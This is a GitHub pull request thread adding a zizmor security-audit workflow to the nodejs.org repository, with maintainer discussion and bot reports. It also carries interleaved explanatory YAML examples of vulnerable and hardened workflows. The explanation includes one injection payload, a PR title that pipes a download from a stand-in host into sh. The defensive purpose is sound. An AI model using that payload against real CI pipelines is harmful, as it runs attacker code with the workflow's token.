
feat(ci): add zizmor#8728

Open
avivkeller wants to merge 3 commits into main from zizmor

Conversation

@avivkeller
Member

Signed-off-by: Aviv Keller <me@aviv.sh>
@avivkeller avivkeller requested a review from a team as a code owner March 16, 2026 21:59
Copilot AI review requested due to automatic review settings March 16, 2026 21:59
@vercel

vercel bot commented Mar 16, 2026

Project nodejs-org: deployment Ready (Preview), updated Mar 18, 2026 2:09pm UTC

@github-actions
Contributor

👋 Codeowner Review Request

The following codeowners have been identified for the changed files:

Team reviewers: @nodejs/web-infra

Please review the changes when you have a chance. Thank you! 🙏

Contributor

Copilot AI left a comment


Pull request overview

Adds a dedicated GitHub Actions workflow to run zizmor for security analysis of this repository’s GitHub Actions configuration, aligning with the referenced web-team security initiative.

Changes:

  • Introduces a new workflow that runs on push and pull_request to main.
  • Uses pinned SHAs for actions/checkout and zizmorcore/zizmor-action.

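The PR's workflow file itself is not shown on this page. As an added example (written for this edit, not the PR's file), here is a zizmor workflow of the shape Copilot's summary describes and zizmor's documentation suggests: triggered on push and pull_request to main, both actions pinned to full commit SHAs, and a least-privilege permissions block so the job can only read the repository and upload findings to Code Scanning. The `<full-commit-sha>` and version strings are placeholders, not the SHAs the PR actually pins.

```yaml
# Added example; not the workflow committed in this PR.
# <full-commit-sha> is a placeholder: pin to the full 40-character SHA of the
# release you audited, and keep the version tag in a trailing comment so
# Dependabot/Renovate can track it.
name: zizmor

on:
  push:
    branches: [main]
  pull_request:
    branches: [main]

# Strip all default GITHUB_TOKEN permissions at the workflow level;
# each job then requests only what it needs.
permissions: {}

jobs:
  zizmor:
    name: GitHub Actions security analysis
    runs-on: ubuntu-latest
    permissions:
      contents: read          # read the workflow files being audited
      security-events: write  # upload SARIF results to the Security tab
    steps:
      - name: Checkout repository
        uses: actions/checkout@<full-commit-sha> # v4.x.y
        with:
          persist-credentials: false  # do not leave the token in .git/config

      - name: Run zizmor
        uses: zizmorcore/zizmor-action@<full-commit-sha> # vX.Y.Z
```

With this shape the findings land in Code Scanning rather than failing the job, which matches the later observation in this thread that zizmor "will just report them unless we add a new rule": gating pull requests on the results is a branch-ruleset setting on the Code Scanning check, not something the workflow file itself does.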

@github-actions
Contributor

github-actions bot commented Mar 16, 2026

📦 Build Size Comparison

Summary

Metric Value
Old Total Size 3.51 MB
New Total Size 3.51 MB
Delta 0 B (0.00%)

Changes

➕ Added Assets (1): .next/static/chunks/f782acd83beef83f.js (208.90 KB)
➖ Removed Assets (1): .next/static/chunks/7ca6b57274045541.js (208.90 KB)

Member

@flakey5 flakey5 left a comment


@MattIPv4
Member

🤔 I don't see this having run on this PR? I would imagine there will be a lot of changes to other workflows required before Zizmor can pass?
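To make concrete what "changes to other workflows" usually means before zizmor passes, the following is an added illustration written for this edit; it is a constructed example and not a workflow from nodejs.org. The first YAML document is a hypothetical job with the patterns that zizmor's template-injection, unpinned-uses and artipacked audits report; the second is the same job hardened. The `<full-commit-sha>` values are placeholders.

```yaml
# Added, constructed example: NOT a workflow from the nodejs.org repository.
# Document 1: the patterns zizmor flags.
name: greet-before
on: pull_request
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      # unpinned-uses: a mutable tag, not a commit SHA
      - uses: actions/checkout@v4
      # artipacked: persist-credentials defaults to true, so the GITHUB_TOKEN
      # is written into .git/config inside the workspace
      # template-injection: the expression is expanded into the script text
      # before bash parses it, so a crafted PR title becomes shell code
      - run: echo "Reviewing: ${{ github.event.pull_request.title }}"
---
# Document 2: the same job after the fixes.
name: greet-after
on: pull_request
permissions: {}             # no default token permissions for any job
jobs:
  greet:
    runs-on: ubuntu-latest
    permissions:
      contents: read          # the only scope this job needs
    steps:
      - uses: actions/checkout@<full-commit-sha> # v4.x.y  (placeholder SHA)
        with:
          persist-credentials: false
      - env:
          # Untrusted input crosses into the shell as an environment variable,
          # so it is data, never code.
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: echo "Reviewing: $PR_TITLE"
```

In the first form a pull-request title such as `"; curl https://example.invalid | sh; #` is pasted verbatim into the script and runs with the job's token; in the second it reaches bash only as `$PR_TITLE`. Running the zizmor CLI locally against `.github/workflows` surfaces the same findings before anything is pushed, which is the quickest way to scope the follow-up fixes discussed in this thread.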

@avivkeller
Member Author

> 🤔 I don't see this having run on this PR? I would imagine there will be a lot of changes to other workflows required before Zizmor can pass?

I copied this workflow from Zizmor's documentation, I can, of course, remove that trigger.

I'm not sure if it will fail PRs, or just report them as having security concerns.

Perhaps I should push another commit with the fixes to the issues it would find?

@MattIPv4
Member

MattIPv4 commented Mar 16, 2026

We're also going to want a branch ruleset change I imagine to block PRs where we have Zizmor failings if we're using the advanced security mode?

@MattIPv4
Member

> I'm not sure if it will fail PRs, or just report them as having security concerns.

It will just report them unless we add a new rule. But, I don't see it running at all? It would show up as a passing Actions check still as it is being run on the PR trigger?

@avivkeller
Member Author

> > I'm not sure if it will fail PRs, or just report them as having security concerns.
>
> It will just report them unless we add a new rule. But, I don't see it running at all? It would show up as a passing Actions check still as it is being run on the PR trigger?

It won't run on this PR, since it's the one that added it (GitHub is weird that way)

@codecov

codecov bot commented Mar 16, 2026

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 75.12%. Comparing base (783305e) to head (e9abd33).
⚠️ Report is 2 commits behind head on main.
✅ All tests successful. No failed tests found.

Additional details and impacted files
@@           Coverage Diff           @@
##             main    #8728   +/-   ##
=======================================
  Coverage   75.12%   75.12%           
=======================================
  Files         104      104           
  Lines        9167     9167           
  Branches      315      315           
=======================================
  Hits         6887     6887           
  Misses       2278     2278           
  Partials        2        2           


Member

@ovflowd ovflowd left a comment


SGTM

@avivkeller avivkeller added this pull request to the merge queue Mar 18, 2026
@avivkeller
Member Author

@nodejs/web-admins remember to add the action to the allowlist

@MattIPv4 MattIPv4 removed this pull request from the merge queue due to a manual request Mar 18, 2026
@MattIPv4
Member

> It won't run on this PR, since it's the one that added it (GitHub is weird that way)

This is false... When you add a new workflow with a pull_request trigger, it will run on the PR that introduces it (assuming the PR isn't a fork).

> @nodejs/web-admins remember to add the action to the allowlist

This is why the workflow hasn't run, if you'd actually checked...


https://github.com/nodejs/nodejs.org/actions/runs/23171995051

Let's actually check the workflow runs and works before we blindly merge the change, please.

@MattIPv4
Member

I've added the action to the list. If you can push a change to cause the CI to run again, that'd be appreciated so we can actually validate the workflow is going to work.

@github-advanced-security

You are seeing this message because GitHub Code Scanning has recently been set up for this repository, or this pull request contains the workflow file for the Code Scanning tool.

What Enabling Code Scanning Means:

  • The 'Security' tab will display more code scanning analysis results (e.g., for the default branch).
  • Depending on your configuration and choice of analysis tool, future pull requests will be annotated with code scanning analysis results.
  • You will be able to see the analysis results for the pull request's branch on this overview once the scans have completed and the checks have passed.

For more information about GitHub Code Scanning, check out the documentation.

@avivkeller
Member Author

> This is why the workflow hasn't run, if you'd actually checked...

I'm sorry I was mistaken previously


6 participants